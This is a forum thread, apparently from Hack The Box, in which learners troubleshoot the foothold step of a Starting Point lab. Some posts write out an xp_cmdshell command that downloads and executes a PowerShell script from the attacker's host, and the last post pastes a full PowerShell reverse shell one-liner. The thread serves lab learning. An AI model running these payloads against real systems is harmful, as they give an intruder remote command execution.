Starting point machine

So I’ve gotten to the end of the foothold and whenever I enter the command: xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.2/shell.ps1\“);” it just kind of hangs and does nothing, the command doesn’t end, I don’t get an error , nothing. One time it did work and and it got recieved as sql_svc, but just my luck my laptop crashed. Now whenever I enter the command I get this in the python terminal 10.10.10.27 - - [21/Apr/2020 10:11:28] “GET /shell.ps1 HTTP/1.1” 200 - So I know that it worked, and I also it get this connect to [10.10.14.2] from (UNKNOWN) [10.10.10.27] 49678 in the netcat listener. I don’t know what to do I left it for a while thinking maybe it is just taking a while to give me the output but nothing happens I can’t continue and am honestly just about to give up. If anyone could help me I would really appreciate it.

Okay so I just tried it again, changed nothing and now I’m getting this…

New-Object : Exception calling “.ctor” with “2” argument(s): "No connection could be made because the target machine

actively refused it 10.10.14.2:443"

At line:1 char:12

  • $client = New-Object System.Net.Sockets.TCPClient(“10.10.14.2”,443); …

  •        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~             
    
    • CategoryInfo : InvalidOperation: (:slight_smile: [New-Object], MethodInvocationException

    • FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.PowerShell.Commands.NewObjectCommand

You cannot call a method on a null-valued expression.

At line:1 char:70

  • … ets.TCPClient(“10.10.14.2”,443);$stream = $client.GetStream();[byte

  •                                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                
    
    • CategoryInfo : InvalidOperation: (:slight_smile: , RuntimeException

    • FullyQualifiedErrorId : InvokeMethodOnNull

You cannot call a method on a null-valued expression.

At line:1 char:138

  • … 65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) …

  •                   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                
    
    • CategoryInfo : InvalidOperation: (:slight_smile: , RuntimeException

    • FullyQualifiedErrorId : InvokeMethodOnNull

You cannot call a method on a null-valued expression.

At line:1 char:464

  • … .Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

  •                                                       ~~~~~~~~~~~~~~~        
    
    • CategoryInfo : InvalidOperation: (:slight_smile: , RuntimeException

    • FullyQualifiedErrorId : InvokeMethodOnNull

NULL

Make sure you’re using your HTB IP address instead of the one given in the tutorial. You want the reverse shell to connect to your machine, so you have to use your IP. Dm if you need a nudge

same happened to me too. After executing command it just hangs. Did you figure out the solution for this yet bro?

Type your comment> @mrdebator said:

Make sure you’re using your HTB IP address instead of the one given in the tutorial. You want the reverse shell to connect to your machine, so you have to use your IP. Dm if you need a nudge

Hey man, I wanted to dm you instead but apparently you can’t send messages unless you’re script kiddie rank, so I hope this is ok. Dude, I’m super stumped on this starting point challenge, and can’t seem to find any answers anywhere. I’ve gotten pretty far, but right now I’m stuck on the part where you have to run shell.ps1 via powershell. I’m pretty sure everything else is correct up to this point, but when I run it, it just says “You cannot call a method on a null valued expression” like a bunch of times. I even tried changing the IP like you mentioned above, but no luck. Please help! I really wanna crack this machine open, man, and I’m so close.

At first I was getting a 404 error, then I changed the location of my shell.ps1 to my user folder in kali and now I’m getting the above error ^. No idea why it’s happening, my python server is showing the GET requests 10.10.10.27 - - [27/Jun/2020 00:15:26] “GET /shell.ps1 HTTP/1.1” 200 -

I notice in netcat the GET requests source IP is there but there’s an ‘unknown’ modifier associated with it? perhaps this is a clue

connect to [10.10.14.(myip)] from (UNKNOWN) [10.10.10.27] 49704

based on “You cannot call a method on a null-valued expression.” I’m assuming the $client object to be undefined, but shouldn’t this be an issue with the startup box itself? the box’s request to my machine returns a 200 http code so it shouldn’t be an issue with my firewall…

Type your comment> @morkcliff said:

Okay so I just tried it again, changed nothing and now I’m getting this…

New-Object : Exception calling “.ctor” with “2” argument(s): "No connection could be made because the target machine

actively refused it 10.10.14.2:443"

At line:1 char:12

  • $client = New-Object System.Net.Sockets.TCPClient(“10.10.14.2”,443); …

  •        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~             
    
    • CategoryInfo : InvalidOperation: (:slight_smile: [New-Object], MethodInvocationException

    • FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.PowerShell.Commands.NewObjectCommand

You cannot call a method on a null-valued expression.

At line:1 char:70

  • … ets.TCPClient(“10.10.14.2”,443);$stream = $client.GetStream();[byte

  •                                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                
    
    • CategoryInfo : InvalidOperation: (:slight_smile: , RuntimeException

    • FullyQualifiedErrorId : InvokeMethodOnNull

You cannot call a method on a null-valued expression.

At line:1 char:138

  • … 65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) …

  •                   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                
    
    • CategoryInfo : InvalidOperation: (:slight_smile: , RuntimeException

    • FullyQualifiedErrorId : InvokeMethodOnNull

You cannot call a method on a null-valued expression.

At line:1 char:464

  • … .Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

  •                                                       ~~~~~~~~~~~~~~~        
    
    • CategoryInfo : InvalidOperation: (:slight_smile: , RuntimeException

    • FullyQualifiedErrorId : InvokeMethodOnNull

NULL

I have your same problem did you find any solution

i get this error when i run the command. changed the IP to my base machine IP too

gives a bash error . copied and pasted the command from HTB website still it shows like this

$client = New-Object System.Net.Sockets.TCPClient(“10.10.14.163”,443);$stream = $client.GetStream();[byte]$bytes = 0…65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();
bash: syntax error near unexpected token `(’

i think i figured it out . i need to create a powershell script and save this in a file?